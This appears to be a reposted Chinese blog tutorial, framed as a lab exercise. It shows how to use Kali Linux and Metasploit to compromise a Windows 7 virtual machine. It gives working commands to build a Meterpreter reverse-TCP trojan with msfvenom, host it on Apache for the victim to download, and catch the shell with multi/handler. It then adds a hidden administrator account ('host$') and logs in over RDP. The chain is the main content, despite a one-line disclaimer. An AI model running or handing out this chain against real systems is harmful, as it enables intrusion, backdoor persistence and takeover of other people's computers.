利用kali Linux 渗透windows 操作系统

这篇具有很好参考价值的文章主要介绍了利用kali Linux 渗透windows 操作系统。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

利用kali Linux 渗透windows 操作系统

一、实验目的:使用kali生成木马,渗透windows系统

二、实验内容:

使用kali中的Metasploit生成木马,控制windows系统

三、实验环境

需要从VMware Workstation 中创建两台虚拟机

一台kali linux和一台靶机windows系统

1、攻击者ip(kali) 192.168.63.21

2、靶机ip(windows)192.168.63.20

四、实验步骤

先将虚拟机的网络模式修改为桥接模式

利用kali Linux 渗透windows 操作系统

利用kali Linux 渗透windows 操作系统

设置靶机ip(windows)

     从右下角网络右键打开网络和共享中心

利用kali Linux 渗透windows 操作系统

点击本地连接

利用kali Linux 渗透windows 操作系统

点击属性

利用kali Linux 渗透windows 操作系统

找到ipv4,双击点开

利用kali Linux 渗透windows 操作系统

设置ip地址

利用kali Linux 渗透windows 操作系统

查看靶机(windows)的ip地址

win+r输入cmd

利用kali Linux 渗透windows 操作系统

进入终端后输入ipconfig查看ip

ip地址为192.168.63.20 设置成功

利用kali Linux 渗透windows 操作系统

设置kali的ip

ifconfig eth0 [要修改的IP地址] netmask [子网掩码]

(重启后生效)

利用kali Linux 渗透windows 操作系统

重启后进入终端输入ifconfig查看ip地址

ip地址为192.168.63.21

利用kali Linux 渗透windows 操作系统

保证两个系统能相互ping通

利用kali Linux 渗透windows 操作系统

利用kali Linux 渗透windows 操作系统

生成木马,在kali打开终端输入以下命令

msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击者ip lport=监听端口 -f 后门文件类型 >/后门文件保存路径/evilshell.txt

利用kali Linux 渗透windows 操作系统

进入木马文件存放路径,将木马文件evilshell.exe复制到 /var/www/html, 输入命令:

利用kali Linux 渗透windows 操作系统

进入目录 /var/www/html,将html目录下的其余文件删除,输入命令:

利用kali Linux 渗透windows 操作系统

开启apache服务,输入命令:

/etc/init.d/apache2 start

利用kali Linux 渗透windows 操作系统

可以用以下命令查看服务开启状态:

/etc/init.d/apache2 status 

出现绿色的字代表服务已经开启

利用kali Linux 渗透windows 操作系统

在windows7靶机上打开浏览器输入kali的IP,访问kali并下载木马文件evilshell.exe

利用kali Linux 渗透windows 操作系统

将文件下载到桌面

利用kali Linux 渗透windows 操作系统

开启postgresql服务,其端口号为5432,输入命令

/etc/init.d/postgresql start

可以用/etc/init.d/postgresql status查看服务开启状态

利用kali Linux 渗透windows 操作系统

查看端口,输入命令

netstat -ntulp

利用kali Linux 渗透windows 操作系统

开启msfconsole,输入命令

msfconsole

利用kali Linux 渗透windows 操作系统

设置攻击模块并运行,输入命令:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 攻击者IP

set LPORT 监听端口

show options

run

利用kali Linux 渗透windows 操作系统

利用kali Linux 渗透windows 操作系统

在靶机中双击运行木马文件(evilshell.exe)

利用kali Linux 渗透windows 操作系统

获取目标主机shell,输入命令

shell

利用kali Linux 渗透windows 操作系统

出现乱码现象,输入命令:

chcp 437

利用kali Linux 渗透windows 操作系统

输入ipconfig查看靶机的ip地址

利用kali Linux 渗透windows 操作系统

在靶机中添加一个隐藏用户(后面加$),并提升隐藏用户的权限,输入以下命令

net user host$ /add

net user

net user host$ 密码

net localgroup administrators host$ /add

net user host$

利用kali Linux 渗透windows 操作系统

利用kali Linux 渗透windows 操作系统

kali打开一个新的终端,使用远程桌面连接靶机(靶机需要开启远程连接服务),输入命令

rdesktop 靶机ip

利用kali Linux 渗透windows 操作系统

使用 host$密码 登录靶机,登录成功后,使用管理员权限打开cmd.添加一个新用户,添加成功则证明渗透成功!

利用kali Linux 渗透windows 操作系统

添加用户:

添加用户成功,表示渗透成功!

利用kali Linux 渗透windows 操作系统

用靶机端切换用户

可以查看到这里出现一个被攻击者添加的一个用户

利用kali Linux 渗透windows 操作系统

实验结果:我们在攻击靶机的时候获取到的权限仅仅为获取靶机的IP地址,对其IP进行渗透,靶机端访问了我们做好的木马文件,结果就被入侵了。

注:(此教程仅用于测试 切勿拿他人电脑恶意测试)

!!!不要将IP提供给他人,不要下载并运行陌生的软件,如果是木马文件,可能会被黑客攻击文章来源地址https://www.toymoban.com/news/detail-450996.html

到了这里,关于利用kali Linux 渗透windows 操作系统的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 第2节 Kali Linux系统初体验及简单操作

    开启kali虚拟机系统后,右键桌面,进入进入终端。 打开后,终端显示内容为: (kali㉿kali)-[~/桌面] ,其中,第一个kali表示现在登录的用户名,第二个kali表示主机名,后面中括号内为当前路径,在下一行开头显示$符号,表示当前用户为一般用户。 切换用户至超级管理员。输

    2024年02月09日
    浏览(37)
  • 网路安全技能竞赛——【Linux操作系统渗透提权】解析(超级详细)

    Linux操作系统渗透提权 任务环境说明: 服务器场景:Server2202(关闭链接) 用户名:hacker        密码:123456 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交; 我这里使用qemu虚拟化启动靶机,如下图所示   Arp-scan -l主机发现   进行端口信息服务探

    2024年02月08日
    浏览(40)
  • linux操作系统与Windows操作系统

    【1】Windows 操作系统和Linux操作系统有什么不同? 1、首先是他们的开放性不同 所谓的开放性就是linux操作系统是开放源du码系统,可以对其程序进行编辑修改。而微软的daoWindows系统是受微软版权保护,只能微软内部进行开发及修改。 2、其次是它们的价格不同 linux系统是免费

    2024年02月04日
    浏览(52)
  • 利用FFmpeg实现windows和linux(federo系统)在局域网环境中的usb摄像头RTSP推流与拉流(在同一局域网下任意PC设备都可以进行拉流操作)

    FFmpeg 是一个免费、开源的跨平台视频和音频流处理工具。 首先,打开终端(在 Windows 中是命令提示符,在 Windows 搜索栏中输入“cmd”,然后打开命令提示符),然后运行以下命令以检查您的系统上是否已安装 FFmpeg: 转到 FFmpeg 官方网站,然后下载最新版本的 Windows 安装包。

    2024年02月02日
    浏览(50)
  • 如何利用Kali Linux进行网站渗透测试:最常用工具详解

    数据来源: ChatGPT         Kali Linux 2022.4虚拟机中自带了大量渗透测试工具,涵盖了信息收集、漏洞利用、口令破解、漏洞扫描等多个方面。         使用方法只能当做参考, 详细的使用教程: 建议您在搜索引擎上输入相关,例如: \\\"Kali Linux 工具名 中文教程

    2024年02月06日
    浏览(50)
  • 通过Kali利用永恒之蓝漏洞目标主机shell,并进行部分后渗透操作

    环境说明 机器 ip地址 Kali主机 192.168.231.129 win7 靶机 192.168.231.143 1.使用kali虚拟机作为攻击机,利用nmap扫描获取目标的IP地址及漏洞,将两个机器包括一个攻击机Kali、win7的网络连接模式都是NAT,即在一个网段里面,然后进行扫描网段,查看存活主机,下面是两台机器的ip地址查

    2024年02月08日
    浏览(56)
  • 操作系统-- Linux vs Windows

    内核是应用连接硬件设备的桥梁 现代操作系统,内核一般会提供 4 个基本能力: 管理进程 、线程,决定哪个进程、线程使用 CPU,也就是进程调度的能力; 管理内存 ,决定内存的分配和回收,也就是内存管理的能力; 管理硬件设备 ,为进程与硬件设备之间提供通信能力,

    2024年01月25日
    浏览(54)
  • 虚拟主机操作系统 Windows、Linux

    操作系统将直接影响服务器的性能、安全性和可用性,因此确保选择合适的操作系统对于成功运行您的网站或应用程序至关重要。以下是一些考虑因素,可帮助您选择适合您需求的虚拟主机操作系统。 1. 熟悉度和技术支持: 如何选择操作系统应该考虑您的经验水平和熟悉度

    2024年01月23日
    浏览(53)
  • 阿里云服务器-修改ecs操作系统,把window系统更换成Linux操作系统

    其他sql格式也在更新中,可直接查看这个系列,要是没有你需要的格式,可在评论或私信我 目录-后期更新打算 点击确定

    2024年02月11日
    浏览(47)
  • 初识Linux操作系统,与windows的区别

    1、Linux操作系统 学习Linux之前,必须知道什么是操作系统。了解操作系统之前得先知道什么是系统,什么是计算机系统。 1.1系统 系统就是由很多部分组成的整体,并且各部分相互作用,相互影响,以此达到某些功能。就像平时所用的微波炉,包含了电源、磁控管、烹调腔、

    2024年02月07日
    浏览(46)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包